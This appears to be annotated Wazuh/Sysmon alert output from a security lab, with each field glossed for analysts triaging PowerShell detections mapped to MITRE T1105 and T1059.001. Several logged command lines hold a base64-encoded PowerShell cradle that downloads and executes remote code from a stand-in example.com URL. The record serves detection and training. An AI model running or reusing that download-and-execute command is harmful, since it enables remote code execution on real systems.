data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:50.758 ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} ProcessId: 4872 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rhjxvxaz.15p.ps1 CreationUtcTime: 2025-04-24 22:39:50.758 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:50.758
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb5-680a-b50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rhjxvxaz.15p.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:50.758
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:56.256+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:56.256+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  100
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534396.1924840
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:53.8734294Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285544
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:53.831 ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} ProcessId: 3664 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_nilkcvgi.iyi.ps1 CreationUtcTime: 2025-04-24 22:39:53.831 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:53.831
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb8-680a-b70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nilkcvgi.iyi.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:53.831
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:56.256+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:56.256+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  96
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534396.1927605
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:53.6430596Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285543
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:52.022 ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} ProcessId: 3664 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} ParentProcessId: 4872 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:52.022
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb8-680a-b70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb5-680a-b50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:58.972+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:58.972+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  97
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534398.1935668
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:56.4053078Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285565
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:55.189 ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} ProcessId: 12340 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} ParentProcessId: 3664 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:55.189
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdbb-680a-b90b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb8-680a-b70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:58.987+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:58.987+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  101
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534398.1943735
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:56.6620358Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285566
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

